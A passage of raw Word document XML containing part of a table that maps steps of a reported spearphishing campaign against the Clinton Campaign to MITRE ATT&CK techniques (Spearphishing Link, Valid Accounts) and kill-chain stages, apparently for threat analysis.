            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A117FA3" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2C5A61AA" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="22617B3F" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="10C1D41D" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="002D1D50" w14:paraId="050D6A0B" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69324CCC" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49B92685" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F07922F" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="407FF50F" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07E90E14" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12CDCFA3" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA366CB" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23AB7DFF" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="002D1D50" w14:paraId="43C74B77" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA9E9A1" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0774CA31" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267D614A" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="330A2328" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F3961E" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69D2B58B" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="538B7B9F" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="291272B5" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="73DC4715" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7764F86A" w14:textId="69968A3A" w:rsidR="00FB171C" w:rsidRDefault="00F308BD" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="779AF52A" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">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0EBC3370" w14:textId="7807422C" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r w:rsidR="00F308BD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>566.002</w:t>
            </w:r>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F308BD" w:rsidRPr="00F308BD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Phishing: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F308BD" w:rsidRPr="00F308BD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F308BD" w:rsidRPr="00F308BD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="650E07CF" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="664E6BE9" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698EB012" w14:textId="26EC28CD" w:rsidR="00FB171C" w:rsidRDefault="00F308BD" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220587FE" w14:textId="34451A76" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="005B1435" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589C00EC" w14:textId="1F3410CF" w:rsidR="00FB171C" w:rsidRPr="00D81EFA" w:rsidRDefault="00F308BD" w:rsidP="008D2933">
            <w:r>
              <w:t xml:space="preserve">[1] p6 21 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F308BD">
              <w:t xml:space="preserve">created and sent a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F308BD">
              <w:t>spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F308BD">
              <w:t xml:space="preserve"> email to the chairman of the Clinton </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F308BD">
              <w:t>Campaign</w:t>
            </w:r>
            <w:r w:rsidR="00842B32">
              <w:t xml:space="preserve">  …</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00842B32">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD4553" w:rsidRPr="00B857D7" w14:paraId="15F553CF" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="302C316C" w14:textId="77777777" w:rsidR="00CD4553" w:rsidRDefault="00CD4553" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A70C2BE" w14:textId="77777777" w:rsidR="00CD4553" w:rsidRPr="00B857D7" w:rsidRDefault="00CD4553" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42EBC9F1" w14:textId="77777777" w:rsidR="00CD4553" w:rsidRPr="001F175E" w:rsidRDefault="00CD4553" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AAEF100" w14:textId="77777777" w:rsidR="00CD4553" w:rsidRDefault="00CD4553" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54606DA8" w14:textId="77777777" w:rsidR="00CD4553" w:rsidRPr="00B857D7" w:rsidRDefault="00CD4553" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="125BAC03" w14:textId="77777777" w:rsidR="00CD4553" w:rsidRDefault="00CD4553" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E2AABB" w14:textId="77777777" w:rsidR="00CD4553" w:rsidRPr="00B857D7" w:rsidRDefault="00CD4553" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FBCB840" w14:textId="724F35F4" w:rsidR="00CD4553" w:rsidRPr="00C5122C" w:rsidRDefault="00CD4553" w:rsidP="00842B32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Credential access achieved on external system (via link)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="0C86D0E9" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="649FD94D" w14:textId="7B1049CB" w:rsidR="00FB171C" w:rsidRDefault="00842B32" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="636055BB" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">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01C5E352" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1078 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FAE61FC" w14:textId="3E0B1AE0" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="008B5957" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF1C5EE" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="794333F1" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="222CA7C1" w14:textId="051B4A98" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="005B1435" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
